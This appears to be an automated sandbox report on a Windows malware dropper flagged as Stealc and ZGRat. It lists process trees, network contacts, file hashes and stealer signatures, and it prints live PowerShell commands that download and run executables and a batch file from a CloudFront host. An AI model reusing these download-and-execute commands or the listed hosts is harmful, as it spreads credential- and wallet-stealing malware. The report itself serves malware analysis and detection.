
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=2838 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe

"C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe"

C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe

"C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

Network

Country Destination Domain Proto
US 8.8.8.8:53 d235izp073r941.cloudfront.net udp
GB 108.156.50.216:443 d235izp073r941.cloudfront.net tcp
US 8.8.8.8:53 d2iv78ooxaijb6.cloudfront.net udp
GB 108.156.32.197:443 d2iv78ooxaijb6.cloudfront.net tcp
GB 108.156.32.197:443 d2iv78ooxaijb6.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
GB 108.156.32.197:443 d2iv78ooxaijb6.cloudfront.net tcp
US 8.8.8.8:53 240429000936002.mjt.kqri92.top udp
DE 185.172.128.90:80 185.172.128.90 tcp
BG 94.156.35.76:80 240429000936002.mjt.kqri92.top tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.150:80 185.172.128.150 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 download.iolo.net udp
FR 185.93.2.251:80 download.iolo.net tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp

Files

\Users\Admin\AppData\Local\Temp\nst1CA6.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\Cab1EBB.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar1EED.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 512346bd435e73ad2fce7ff08875399e
SHA1 0f0279bdd66f7cdd2f1c803667737d87586a0c23
SHA256 1747cfc629afde110d753d308ed10390a6c7cbf7ec6f640862561a613e6763a2
SHA512 4c5fe1ce4118925688dbbdf537e04fb2b5752ea1ebe0fe08534decbee0b540b21e9e8ec9264e2735eb99b2fe9f7736df7c1093c7ca85f3f45414fb6ce83fbe3c

C:\Users\Admin\AppData\Local\Temp\nst1CA6.tmp\est.bat

MD5 f32d05160acf8325e9a09f09f80d16f4
SHA1 46e159b71e6ef99076c4002e1fda134e1d0a86c9
SHA256 da8f4f45b105538f0063ece220b69455b15c8e680099c02221c093ecb794ae37
SHA512 147c870edd09fa3f6cd93caae809b5d66fecc759e3cfee4e47dc487786edc760989fdb23310b4284e63871fe1b1d805e949601f54bfc93ff80e2e097a989879b

memory/2204-139-0x0000000001C10000-0x0000000001C50000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 a19b0219e481a0edfe2dcf75bfb05855
SHA1 fc8884787bd14f29611a1dca769e49734478dbb6
SHA256 6a86f24734f1fd8f4764487ea2b453a9a85f6fc5ae041a2113e2a6f2490f81f2
SHA512 2c6dfa33a4dab6585deb35ba11ff676c9fcc4f30a7384db9b9ad38d7ac3ce27213ba36fb7968eda55d76c928ab13cce4ea800bb6ecebda27820d2f260b431be2

\Users\Admin\AppData\Local\Temp\i1.exe

MD5 e8fe249ed5e4a60afe3b5e0063b2aa1a
SHA1 10136812a9720946b8b3de256bd80464a7c15745
SHA256 a1aa7034c117960e045a7386df698cfaaab3bfd8b13d02bbee56b1e62e67e46f
SHA512 ff212796d65628d63474fa261f648e1b93a974aa1db70bb1edac039de9ed798f5e50debd823b407b208894ed33e320bab1a7275c5649446ff9f8e8b8bac12973

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\Users\Admin\AppData\Local\Temp\u1t4.0.exe

MD5 a33065159222d4c22e581ea419285701
SHA1 6297d390c9d8c3b8c3340d8d38d46c1bbf32d354
SHA256 ddf2f47cbc0db66b326be096b46854a6ab59a2504688077bba0bbb42c4470ae2
SHA512 2860dab79524b7db3f0b7771b8d402905a8096653d1c83e49e3827bb7cd739104848b691be16fbd898b81bfd4fcdd827fc4c8f72da6e91d565f02e59f5725f79

C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/1492-208-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/2344-207-0x0000000000400000-0x0000000002B1E000-memory.dmp

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 e7b69c20dedfdcf2a4fc7483ce52d7ca
SHA1 9b560e705c344b534f19dadc93d53eeb24741950
SHA256 fdd9c6f0feee995899a9b8a8a611ce19a61ce0ae9da648e72ec702b24685454b
SHA512 d5b1a51aa140091feffd67ab8096e979f3c008062dd469d908ffd33e5669629a912f09392f913410f708da32ab4ad7bc666bac3e3fd51b2064e93b73ddbcb513

memory/1492-296-0x0000000000400000-0x0000000002AF1000-memory.dmp

memory/1304-298-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2644-299-0x0000000000EA0000-0x00000000046D4000-memory.dmp

memory/2644-300-0x000000001EEE0000-0x000000001EFEA000-memory.dmp

memory/2644-301-0x0000000000640000-0x0000000000650000-memory.dmp

memory/2644-302-0x00000000006C0000-0x00000000006CC000-memory.dmp

memory/2644-303-0x00000000006B0000-0x00000000006C4000-memory.dmp

memory/2644-304-0x0000000000CA0000-0x0000000000CC4000-memory.dmp

memory/2644-305-0x0000000000E90000-0x0000000000E9A000-memory.dmp

memory/2644-306-0x000000001E120000-0x000000001E14A000-memory.dmp

memory/2644-307-0x000000001E2D0000-0x000000001E382000-memory.dmp

memory/2644-308-0x0000000000660000-0x000000000066A000-memory.dmp

memory/2644-312-0x000000001FD10000-0x0000000020010000-memory.dmp

memory/2644-315-0x0000000000680000-0x000000000068A000-memory.dmp

memory/2644-314-0x0000000000680000-0x000000000068A000-memory.dmp

memory/2644-316-0x0000000000BE0000-0x0000000000BEA000-memory.dmp

memory/2644-317-0x0000000005AE0000-0x0000000005B42000-memory.dmp

memory/2644-318-0x0000000000BF0000-0x0000000000C12000-memory.dmp

memory/2644-321-0x0000000000E50000-0x0000000000E5C000-memory.dmp

memory/2644-325-0x0000000000680000-0x000000000068A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\cb82900d7c0d19605a9c1adc1be5fc0aee77ab3bfdbb4ee40526b56ef2d7a2ce\0c505e714cfb4ebcb371d6c9f825e8f6.tmp

MD5 27b38db6c8dc1964159ce80dd9bfe43d
SHA1 b62e63f790ed5d169ae5c39549fcafaa7b5a44ec
SHA256 c7ea5c83de8fe127d1ce6aa2a4dd236c7bac61c99cee8bdd1ed30a554094fc64
SHA512 c8944c5dcafe406c78c68395614c70edff056c4b89462b327c3809fe65b8a97fd58463a0c4c6a7f810c8bc4274bb5b119a3a548dd5c8ef44f5ef8e56acbc3a96

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-10 01:17

Reported

2024-05-10 01:20

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

ZGRat

rat zgrat

Detect binaries embedding considerable number of MFA browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A

Detects encrypted or obfuscated .NET executables

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\i1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\u16g.1.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\i1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u16g.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u16g.1.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\u16g.0.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u16g.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u16g.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u16g.1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u16g.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u16g.0.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u16g.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u16g.0.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4392 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe C:\Windows\SysWOW64\cmd.exe
PID 3536 wrote to memory of 4780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 4780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 4780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 3536 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 3536 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 3536 wrote to memory of 4536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 4536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 4536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1528 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u16g.0.exe
PID 1528 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u16g.0.exe
PID 1528 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u16g.0.exe
PID 1528 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u16g.1.exe
PID 1528 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u16g.1.exe
PID 1528 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u16g.1.exe
PID 3168 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\u16g.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 3168 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\u16g.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe

"C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nss4EAD.tmp\est.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=2838 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\u16g.0.exe

"C:\Users\Admin\AppData\Local\Temp\u16g.0.exe"

C:\Users\Admin\AppData\Local\Temp\u16g.1.exe

"C:\Users\Admin\AppData\Local\Temp\u16g.1.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 840 -ip 840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 2344

Network

Country Destination Domain Proto
US 8.8.8.8:53 d235izp073r941.cloudfront.net udp
GB 108.156.50.188:443 d235izp073r941.cloudfront.net tcp
US 8.8.8.8:53 188.50.156.108.in-addr.arpa udp
US 8.8.8.8:53 12.178.204.143.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 113.216.138.108.in-addr.arpa udp
US 8.8.8.8:53 d2iv78ooxaijb6.cloudfront.net udp
GB 108.156.32.207:443 d2iv78ooxaijb6.cloudfront.net tcp
US 8.8.8.8:53 207.32.156.108.in-addr.arpa udp
GB 108.156.32.207:443 d2iv78ooxaijb6.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
GB 108.156.32.207:443 d2iv78ooxaijb6.cloudfront.net tcp
US 8.8.8.8:53 240429000936002.mjt.kqri92.top udp
BG 94.156.35.76:80 240429000936002.mjt.kqri92.top tcp
US 8.8.8.8:53 76.35.156.94.in-addr.arpa udp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 228.128.172.185.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 45.87.157.20.in-addr.arpa udp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.50:443 download.iolo.net tcp
US 8.8.8.8:53 50.56.244.143.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 150.155.9.20.in-addr.arpa udp
DE 185.172.128.150:80 185.172.128.150 tcp
US 8.8.8.8:53 150.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nss4EAD.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\nss4EAD.tmp\est.bat

MD5 f32d05160acf8325e9a09f09f80d16f4
SHA1 46e159b71e6ef99076c4002e1fda134e1d0a86c9
SHA256 da8f4f45b105538f0063ece220b69455b15c8e680099c02221c093ecb794ae37
SHA512 147c870edd09fa3f6cd93caae809b5d66fecc759e3cfee4e47dc487786edc760989fdb23310b4284e63871fe1b1d805e949601f54bfc93ff80e2e097a989879b

memory/4780-18-0x000000007343E000-0x000000007343F000-memory.dmp

memory/4780-19-0x00000000029B0000-0x00000000029E6000-memory.dmp

memory/4780-20-0x00000000050F0000-0x0000000005718000-memory.dmp

memory/4780-21-0x0000000073430000-0x0000000073BE0000-memory.dmp

memory/4780-23-0x0000000073430000-0x0000000073BE0000-memory.dmp

memory/4780-22-0x00000000057B0000-0x00000000057D2000-memory.dmp

memory/4780-24-0x0000000005850000-0x00000000058B6000-memory.dmp

memory/4780-25-0x00000000058C0000-0x0000000005926000-memory.dmp

memory/4780-26-0x0000000005930000-0x0000000005C84000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wnlrp5as.1gi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4780-36-0x0000000005F30000-0x0000000005F4E000-memory.dmp

memory/4780-37-0x0000000005F50000-0x0000000005F9C000-memory.dmp

